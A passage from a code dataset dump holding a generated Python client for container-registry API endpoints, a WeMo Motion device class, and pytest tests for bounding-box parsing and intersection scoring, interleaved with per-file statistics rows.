                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
def delete_registry(self, registry_id, **kwargs):
"""
Delete specified registry
Deletes the specified registry.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_registry(registry_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str registry_id: hexadecimal ID of registry to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_registry_with_http_info(registry_id, **kwargs)
else:
(data) = self.delete_registry_with_http_info(registry_id, **kwargs)
return data
    def delete_registry_with_http_info(self, registry_id, **kwargs):
        """
        Delete specified registry
        Deletes the specified registry.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_registry_with_http_info(registry_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str registry_id: hexadecimal ID of registry to delete (required)
        :return: None
            If the method is called asynchronously,
            returns the request thread.
        """
        # Reject keyword arguments this endpoint does not understand.
        all_params = ['registry_id']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_registry" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'registry_id' is set
        if ('registry_id' not in params) or (params['registry_id'] is None):
            raise ValueError("Missing the required parameter `registry_id` when calling `delete_registry`")
        collection_formats = {}
        # The registry ID is interpolated into the URL path.
        path_params = {}
        if 'registry_id' in params:
            path_params['registryID'] = params['registry_id']
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # Authentication setting
        auth_settings = ['ApiKey']
        return self.api_client.call_api('/Registries/{registryID}', 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type=None,
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
def get_registries(self, **kwargs):
"""
Get defined registries
Returns a list of defined images that are accessible to this user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_registries(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: Registries
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_registries_with_http_info(**kwargs)
else:
(data) = self.get_registries_with_http_info(**kwargs)
return data
    def get_registries_with_http_info(self, **kwargs):
        """
        Get defined registries
        Returns a list of defined images that are accessible to this user.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_registries_with_http_info(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :return: Registries
            If the method is called asynchronously,
            returns the request thread.
        """
        # No endpoint-specific parameters; only the framework keywords.
        all_params = []
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_registries" % key
                )
            params[key] = val
        del params['kwargs']
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # Authentication setting
        auth_settings = ['ApiKey']
        return self.api_client.call_api('/Registries', 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='Registries',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
def get_registry(self, registry_id, **kwargs):
"""
Get specified registry
Returns details about the specified registry.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_registry(registry_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str registry_id: hexadecimal ID of registry to get (required)
:return: Registry
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_registry_with_http_info(registry_id, **kwargs)
else:
(data) = self.get_registry_with_http_info(registry_id, **kwargs)
return data
def get_registry_with_http_info(self, registry_id, **kwargs):
    """
    Get specified registry
    Returns details about the specified registry.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.get_registry_with_http_info(registry_id, callback=callback_function)
    :param callback function: The callback function
    for asynchronous request. (optional)
    :param str registry_id: hexadecimal ID of registry to get (required)
    :return: Registry
    If the method is called asynchronously,
    returns the request thread.
    """
    # Keyword arguments accepted by this endpoint.
    all_params = []
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() is captured before any other local is created, so
    # `params` holds exactly self, registry_id and kwargs at this point.
    params = locals()
    # Reject unknown keyword arguments, then fold kwargs into params.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_registry" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'registry_id' is set
    if ('registry_id' not in params) or (params['registry_id'] is None):
        raise ValueError("Missing the required parameter `registry_id` when calling `get_registry`")
    collection_formats = {}
    # URL templating: {registryID} is substituted from registry_id.
    path_params = {}
    if 'registry_id' in params:
        path_params['registryID'] = params['registry_id']
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # Authentication setting
    auth_settings = ['ApiKey']
    return self.api_client.call_api('/Registries/{registryID}', 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Registry',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def get_registry_by_name(self, registry_name, **kwargs):
    """
    Get registry by name
    Returns details about a registry matching the passed name.
    Synchronous by default; pass a `callback` keyword argument to make the
    request asynchronously, in which case the request thread is returned
    and the callback is invoked with the response.
    :param callback function: The callback function
    for asynchronous request. (optional)
    :param str registry_name: Name of registry to get (required)
    :return: Registry
    If the method is called asynchronously,
    returns the request thread.
    """
    # Always unwrap to the deserialized data (not the full HTTP triple).
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        # Asynchronous: hand back the request thread straight away.
        return self.get_registry_by_name_with_http_info(registry_name, **kwargs)
    # Synchronous: the helper already returns the deserialized data.
    return self.get_registry_by_name_with_http_info(registry_name, **kwargs)
def get_registry_by_name_with_http_info(self, registry_name, **kwargs):
    """
    Get registry by name
    Returns details about a registry matching the passed name.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.get_registry_by_name_with_http_info(registry_name, callback=callback_function)
    :param callback function: The callback function
    for asynchronous request. (optional)
    :param str registry_name: Name of registry to get (required)
    :return: Registry
    If the method is called asynchronously,
    returns the request thread.
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['registry_name']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() is captured before any other local is created, so
    # `params` holds exactly self, registry_name and kwargs at this point.
    params = locals()
    # Reject unknown keyword arguments, then fold kwargs into params.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_registry_by_name" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'registry_name' is set
    if ('registry_name' not in params) or (params['registry_name'] is None):
        raise ValueError("Missing the required parameter `registry_name` when calling `get_registry_by_name`")
    collection_formats = {}
    # URL templating: {registryName} is substituted from registry_name.
    path_params = {}
    if 'registry_name' in params:
        path_params['registryName'] = params['registry_name']
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # Authentication setting
    auth_settings = ['ApiKey']
    return self.api_client.call_api('/RegistriesByName/{registryName}', 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Registry',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def list_all_images_in_registry(self, registry_id, **kwargs):
    """
    Get container images in registry
    Returns an array of images which are definied as using the specified registry.
    Synchronous by default; pass a `callback` keyword argument to make the
    request asynchronously, in which case the request thread is returned
    and the callback is invoked with the response.
    :param callback function: The callback function
    for asynchronous request. (optional)
    :param str registry_id: hexadecimal ID of registry to get list of images for (required)
    :return: Image
    If the method is called asynchronously,
    returns the request thread.
    """
    # Always unwrap to the deserialized data (not the full HTTP triple).
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        # Asynchronous: hand back the request thread straight away.
        return self.list_all_images_in_registry_with_http_info(registry_id, **kwargs)
    # Synchronous: the helper already returns the deserialized data.
    return self.list_all_images_in_registry_with_http_info(registry_id, **kwargs)
def list_all_images_in_registry_with_http_info(self, registry_id, **kwargs):
    """
    Get container images in registry
    Returns an array of images which are definied as using the specified registry.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.list_all_images_in_registry_with_http_info(registry_id, callback=callback_function)
    :param callback function: The callback function
    for asynchronous request. (optional)
    :param str registry_id: hexadecimal ID of registry to get list of images for (required)
    :return: Image
    If the method is called asynchronously,
    returns the request thread.
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['registry_id']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() is captured before any other local is created, so
    # `params` holds exactly self, registry_id and kwargs at this point.
    params = locals()
    # Reject unknown keyword arguments, then fold kwargs into params.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_all_images_in_registry" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'registry_id' is set
    if ('registry_id' not in params) or (params['registry_id'] is None):
        raise ValueError("Missing the required parameter `registry_id` when calling `list_all_images_in_registry`")
    collection_formats = {}
    # URL templating: {registryID} is substituted from registry_id.
    path_params = {}
    if 'registry_id' in params:
        path_params['registryID'] = params['registry_id']
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # Authentication setting
    auth_settings = ['ApiKey']
    return self.api_client.call_api('/Registries/{registryID}/Images', 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Image',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def update_registry(self, registry_id, **kwargs):
    """
    Update specified registry
    Updates the specified registry with data passed in request body.
    Synchronous by default; pass a `callback` keyword argument to make the
    request asynchronously, in which case the request thread is returned
    and the callback is invoked with the response.
    :param callback function: The callback function
    for asynchronous request. (optional)
    :param str registry_id: hexadecimal ID of registry to update (required)
    :param Registry registry:
    :return: Registry
    If the method is called asynchronously,
    returns the request thread.
    """
    # Always unwrap to the deserialized data (not the full HTTP triple).
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        # Asynchronous: hand back the request thread straight away.
        return self.update_registry_with_http_info(registry_id, **kwargs)
    # Synchronous: the helper already returns the deserialized data.
    return self.update_registry_with_http_info(registry_id, **kwargs)
def update_registry_with_http_info(self, registry_id, **kwargs):
    """
    Update specified registry
    Updates the specified registry with data passed in request body.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.update_registry_with_http_info(registry_id, callback=callback_function)
    :param callback function: The callback function
    for asynchronous request. (optional)
    :param str registry_id: hexadecimal ID of registry to update (required)
    :param Registry registry: updated registry data, serialized as the request body
    :return: Registry
    If the method is called asynchronously,
    returns the request thread.
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['registry_id', 'registry']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() is captured before any other local is created, so
    # `params` holds exactly self, registry_id and kwargs at this point.
    params = locals()
    # Reject unknown keyword arguments, then fold kwargs into params.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_registry" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'registry_id' is set
    if ('registry_id' not in params) or (params['registry_id'] is None):
        raise ValueError("Missing the required parameter `registry_id` when calling `update_registry`")
    collection_formats = {}
    # URL templating: {registryID} is substituted from registry_id.
    path_params = {}
    if 'registry_id' in params:
        path_params['registryID'] = params['registry_id']
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    # The optional Registry object becomes the POST body.
    body_params = None
    if 'registry' in params:
        body_params = params['registry']
    # Authentication setting
    auth_settings = ['ApiKey']
    return self.api_client.call_api('/Registries/{registryID}', 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Registry',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
| 41.814234
| 383
| 0.568659
| 3,468
| 34,664
| 5.44406
| 0.065167
| 0.067797
| 0.023729
| 0.030508
| 0.933422
| 0.918326
| 0.911229
| 0.896981
| 0.890466
| 0.883316
| 0
| 0.00027
| 0.358181
| 34,664
| 828
| 384
| 41.864734
| 0.848346
| 0.343353
| 0
| 0.771144
| 0
| 0
| 0.153681
| 0.03606
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042289
| false
| 0
| 0.017413
| 0
| 0.121891
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4f5055fbc951fb80bc365c15976e620d24ef2065
| 141
|
py
|
Python
|
pywemo/ouimeaux_device/motion.py
|
sullivanmj/pywemo
|
2ef78e015476f5e983c1f39eefa3f274a4685bdd
|
[
"MIT"
] | 102
|
2016-01-07T17:13:02.000Z
|
2021-03-11T09:04:20.000Z
|
pywemo/ouimeaux_device/motion.py
|
sullivanmj/pywemo
|
2ef78e015476f5e983c1f39eefa3f274a4685bdd
|
[
"MIT"
] | 188
|
2015-12-31T08:50:41.000Z
|
2021-03-10T16:51:26.000Z
|
pywemo/ouimeaux_device/motion.py
|
sullivanmj/pywemo
|
2ef78e015476f5e983c1f39eefa3f274a4685bdd
|
[
"MIT"
] | 61
|
2016-02-16T02:28:17.000Z
|
2021-03-07T23:05:38.000Z
|
"""Representation of a WeMo Motion device."""
from . import Device
class Motion(Device):
    """Representation of a WeMo Motion device."""
    # No device-specific behaviour here: the Motion sensor is fully served
    # by the base Device implementation; this subclass only names the type.
| 20.142857
| 49
| 0.702128
| 18
| 141
| 5.5
| 0.5
| 0.363636
| 0.343434
| 0.424242
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170213
| 141
| 6
| 50
| 23.5
| 0.846154
| 0.560284
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
4f832be468d00585f80412a909f1d8e2699a39ab
| 11,237
|
py
|
Python
|
tests/evaluation/custom/bounding_box_intersection_test.py
|
elifesciences/sciencebeam-judge
|
357f1b4266674611b24371224468db268ed4574e
|
[
"MIT"
] | null | null | null |
tests/evaluation/custom/bounding_box_intersection_test.py
|
elifesciences/sciencebeam-judge
|
357f1b4266674611b24371224468db268ed4574e
|
[
"MIT"
] | 189
|
2018-01-11T17:14:18.000Z
|
2022-03-28T17:30:11.000Z
|
tests/evaluation/custom/bounding_box_intersection_test.py
|
elifesciences/sciencebeam-judge
|
357f1b4266674611b24371224468db268ed4574e
|
[
"MIT"
] | null | null | null |
from sciencebeam_judge.utils.bounding_box import (
EMPTY_PAGE_BOUNDING_BOX_LIST,
BoundingBox,
PageBoundingBox,
PageBoundingBoxList
)
from sciencebeam_judge.evaluation.custom.bounding_box_intersection import (
DEFAULT_BOUNDING_BOX_RESOLUTION,
DEFAULT_BOUNDING_BOX_SCORING_TYPE_NAME,
BoundingBoxIntersectionAreaEvaluation,
BoundingBoxIntersectionEvaluation,
format_page_bounding_box_list,
get_formatted_page_bounding_box_list_area_match_score,
get_page_bounding_box_list_area_match_score,
parse_page_bounding_box_list
)
# Area scale factor used by the area-based assertions below: areas are
# reported in resolution-scaled units, i.e. multiplied by resolution squared.
DEFAULT_BOUNDING_BOX_SQUARED_RESOLUTION = (
    DEFAULT_BOUNDING_BOX_RESOLUTION * DEFAULT_BOUNDING_BOX_RESOLUTION
)
class TestParsePageBoundingBoxList:
    """Tests for parse_page_bounding_box_list.

    The serialized form is semicolon-separated page boxes, each encoded as
    'page_number,x,y,width,height'.
    """

    def test_should_parse_empty_none(self):
        parsed = parse_page_bounding_box_list(None)
        assert not parsed.page_bounding_box_list
        assert not parsed

    def test_should_parse_empty_string(self):
        parsed = parse_page_bounding_box_list('')
        assert not parsed.page_bounding_box_list
        assert not parsed

    def test_should_parse_single_bounding_box(self):
        parsed = parse_page_bounding_box_list(
            '101,102.22,103.33,104.44,105.55'
        )
        assert parsed
        assert parsed.page_bounding_box_list
        expected = PageBoundingBox(
            page_number=101,
            bounding_box=BoundingBox(
                x=102.22, y=103.33, width=104.44, height=105.55
            )
        )
        assert parsed.page_bounding_box_list[0] == expected

    def test_should_parse_multiple_bounding_box(self):
        parsed = parse_page_bounding_box_list(
            '101,102.22,103.33,104.44,105.55;'
            '201,202.22,203.33,204.44,205.55'
        )
        assert parsed
        assert parsed.page_bounding_box_list
        expected = [
            PageBoundingBox(
                page_number=101,
                bounding_box=BoundingBox(
                    x=102.22, y=103.33, width=104.44, height=105.55
                )
            ),
            PageBoundingBox(
                page_number=201,
                bounding_box=BoundingBox(
                    x=202.22, y=203.33, width=204.44, height=205.55
                )
            )
        ]
        assert parsed.page_bounding_box_list == expected
class TestFormatPageBoundingBoxList:
    """Tests for format_page_bounding_box_list (inverse of the parser)."""

    def test_should_format_empty_page_bounding_box_list(self):
        formatted = format_page_bounding_box_list(PageBoundingBoxList([]))
        assert formatted == ''

    def test_should_format_single_page_bounding_box_list_item(self):
        page_box = PageBoundingBox(
            page_number=101,
            bounding_box=BoundingBox(
                x=102.22, y=103.33, width=104.44, height=105.55
            )
        )
        formatted = format_page_bounding_box_list(PageBoundingBoxList([page_box]))
        assert formatted == '101,102.22,103.33,104.44,105.55'

    def test_should_format_multiple_page_bounding_box_list_items(self):
        page_boxes = [
            PageBoundingBox(
                page_number=101,
                bounding_box=BoundingBox(
                    x=102.22, y=103.33, width=104.44, height=105.55
                )
            ),
            PageBoundingBox(
                page_number=201,
                bounding_box=BoundingBox(
                    x=202.22, y=203.33, width=204.44, height=205.55
                )
            )
        ]
        formatted = format_page_bounding_box_list(PageBoundingBoxList(page_boxes))
        assert formatted == (
            '101,102.22,103.33,104.44,105.55;'
            '201,202.22,203.33,204.44,205.55'
        )
# Shared fixture: a single bounding box on page 101, used as the canonical
# non-empty value throughout the match-score tests below.
NON_EMPTY_PAGE_BOUNDING_BOX_LIST = PageBoundingBoxList([
    PageBoundingBox(
        page_number=101,
        bounding_box=BoundingBox(
            x=102.22, y=103.33, width=104.44, height=105.55
        )
    )
])
class TestGetPageBoundingBoxListAreaMatchScore:
    """Tests for get_page_bounding_box_list_area_match_score.

    Per the assertions below: disjoint/empty-vs-non-empty pairs score 0.0,
    identical lists (including two empty lists) score 1.0, and partial
    overlap scores proportionally.
    """

    def test_should_return_zero_for_non_empty_empty_page_bounding_box_list(self):
        result = get_page_bounding_box_list_area_match_score(
            NON_EMPTY_PAGE_BOUNDING_BOX_LIST,
            EMPTY_PAGE_BOUNDING_BOX_LIST
        )
        assert result == 0.0

    def test_should_return_zero_for_empty_non_empty_page_bounding_box_list(self):
        result = get_page_bounding_box_list_area_match_score(
            EMPTY_PAGE_BOUNDING_BOX_LIST,
            NON_EMPTY_PAGE_BOUNDING_BOX_LIST
        )
        assert result == 0.0

    def test_should_return_one_for_equal_page_bounding_box_lists(self):
        result = get_page_bounding_box_list_area_match_score(
            NON_EMPTY_PAGE_BOUNDING_BOX_LIST,
            NON_EMPTY_PAGE_BOUNDING_BOX_LIST
        )
        assert result == 1.0

    def test_should_return_one_for_two_empty_page_bounding_box_lists(self):
        result = get_page_bounding_box_list_area_match_score(
            EMPTY_PAGE_BOUNDING_BOX_LIST,
            EMPTY_PAGE_BOUNDING_BOX_LIST
        )
        assert result == 1.0

    def test_should_return_dot_five_for_half_overlapping_page_bounding_box_lists(self):
        # Same page and origin; the second box covers half the height of
        # the first, so half the combined area overlaps.
        result = get_page_bounding_box_list_area_match_score(
            PageBoundingBoxList([PageBoundingBox(
                page_number=101,
                bounding_box=BoundingBox(
                    x=102.22, y=103.33, width=200, height=100
                )
            )]),
            PageBoundingBoxList([PageBoundingBox(
                page_number=101,
                bounding_box=BoundingBox(
                    x=102.22, y=103.33, width=200, height=50
                )
            )])
        )
        # Rounded: the score is computed on a rasterized area and may not
        # be exactly 0.5.
        assert round(result, 3) == 0.5
class TestGetFormattedPageBoundingBoxListAreaMatchScore:
    """Tests for get_formatted_page_bounding_box_list_area_match_score.

    Same expectations as the unformatted variant above, but operating on
    the serialized string form (empty string = empty list).
    """

    def test_should_return_zero_for_non_empty_empty_page_bounding_box_list(self):
        result = get_formatted_page_bounding_box_list_area_match_score(
            format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST),
            ''
        )
        assert result == 0.0

    def test_should_return_zero_for_empty_non_empty_page_bounding_box_list(self):
        result = get_formatted_page_bounding_box_list_area_match_score(
            '',
            format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)
        )
        assert result == 0.0

    def test_should_return_one_for_equal_page_bounding_box_lists(self):
        result = get_formatted_page_bounding_box_list_area_match_score(
            format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST),
            format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)
        )
        assert result == 1.0

    def test_should_return_dot_five_for_half_overlapping_page_bounding_box_lists(self):
        # Second box covers half the height of the first (same page/origin).
        result = get_formatted_page_bounding_box_list_area_match_score(
            format_page_bounding_box_list(PageBoundingBoxList([PageBoundingBox(
                page_number=101,
                bounding_box=BoundingBox(
                    x=102.22, y=103.33, width=200, height=100
                )
            )])),
            format_page_bounding_box_list(PageBoundingBoxList([PageBoundingBox(
                page_number=101,
                bounding_box=BoundingBox(
                    x=102.22, y=103.33, width=200, height=50
                )
            )]))
        )
        assert round(result, 3) == 0.5
class TestBoundingBoxIntersectionEvaluation:
    """Tests for BoundingBoxIntersectionEvaluation: config handling and
    end-to-end scoring over serialized bounding box lists."""

    def test_should_be_able_to_pass_in_config(self):
        custom_evaluation = BoundingBoxIntersectionEvaluation(
            config={'scoring_type': 'set'}
        )
        assert custom_evaluation.scoring_type_name == 'set'

    def test_should_use_default_scoring_type_if_blank(self):
        # An explicitly blank scoring_type falls back to the default too.
        custom_evaluation = BoundingBoxIntersectionEvaluation(
            config={'scoring_type': ''}
        )
        assert custom_evaluation.scoring_type_name == DEFAULT_BOUNDING_BOX_SCORING_TYPE_NAME

    def test_should_use_default_without_config(self):
        custom_evaluation = BoundingBoxIntersectionEvaluation()
        assert custom_evaluation.scoring_type_name == DEFAULT_BOUNDING_BOX_SCORING_TYPE_NAME

    def test_should_return_zero_for_non_empty_empty_page_bounding_box_list(self):
        result = BoundingBoxIntersectionEvaluation().score(
            [format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)],
            ['']
        )
        assert result.score == 0.0

    def test_should_return_zero_for_empty_non_empty_page_bounding_box_list(self):
        result = BoundingBoxIntersectionEvaluation().score(
            [''],
            [format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)]
        )
        assert result.score == 0.0

    def test_should_return_one_for_equal_page_bounding_box_lists(self):
        result = BoundingBoxIntersectionEvaluation().score(
            [format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)],
            [format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)]
        )
        assert result.score == 1.0
class TestBoundingBoxIntersectionAreaEvaluation:
    """Tests for BoundingBoxIntersectionAreaEvaluation.

    In addition to the score, this evaluation reports true/false
    positive/negative *areas* in resolution-scaled units (area multiplied
    by the squared resolution).
    """

    def test_should_return_zero_for_non_empty_empty_page_bounding_box_list(self):
        result = BoundingBoxIntersectionAreaEvaluation().score(
            [format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)],
            ['']
        )
        assert result.score == 0.0
        assert result.true_positive == 0
        assert result.false_positive == 0
        # The whole expected-but-missing area counts as false negative.
        assert result.false_negative == round(
            NON_EMPTY_PAGE_BOUNDING_BOX_LIST.area * DEFAULT_BOUNDING_BOX_SQUARED_RESOLUTION
        )

    def test_should_return_zero_for_empty_non_empty_page_bounding_box_list(self):
        result = BoundingBoxIntersectionAreaEvaluation().score(
            [''],
            [format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)]
        )
        assert result.score == 0.0
        assert result.true_positive == 0
        # The whole predicted-but-unexpected area counts as false positive.
        assert result.false_positive == round(
            NON_EMPTY_PAGE_BOUNDING_BOX_LIST.area * DEFAULT_BOUNDING_BOX_SQUARED_RESOLUTION
        )
        assert result.false_negative == 0

    def test_should_return_one_for_equal_page_bounding_box_lists(self):
        result = BoundingBoxIntersectionAreaEvaluation().score(
            [format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)],
            [format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)]
        )
        assert result.score == 1.0
        # Perfect overlap: the entire area is true positive.
        assert result.true_positive == round(
            NON_EMPTY_PAGE_BOUNDING_BOX_LIST.area * DEFAULT_BOUNDING_BOX_SQUARED_RESOLUTION
        )
        assert result.false_positive == 0
        assert result.false_negative == 0

    def test_should_be_able_to_configure_resolution(self):
        # A custom resolution changes the unit in which areas are counted.
        result = BoundingBoxIntersectionAreaEvaluation({
            'resolution': 100
        }).score(
            [format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)],
            [format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)]
        )
        assert result.score == 1.0
        assert result.true_positive == round(
            NON_EMPTY_PAGE_BOUNDING_BOX_LIST.scale_by(100, 100).area
        )
        assert result.false_positive == 0
        assert result.false_negative == 0
| 37.708054
| 92
| 0.66281
| 1,300
| 11,237
| 5.228462
| 0.083077
| 0.182875
| 0.194203
| 0.226423
| 0.88848
| 0.848757
| 0.835663
| 0.787112
| 0.770781
| 0.760335
| 0
| 0.051785
| 0.269645
| 11,237
| 297
| 93
| 37.835017
| 0.77641
| 0
| 0
| 0.590038
| 0
| 0
| 0.02029
| 0.01673
| 0
| 0
| 0
| 0
| 0.168582
| 1
| 0.099617
| false
| 0.003831
| 0.007663
| 0
| 0.130268
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
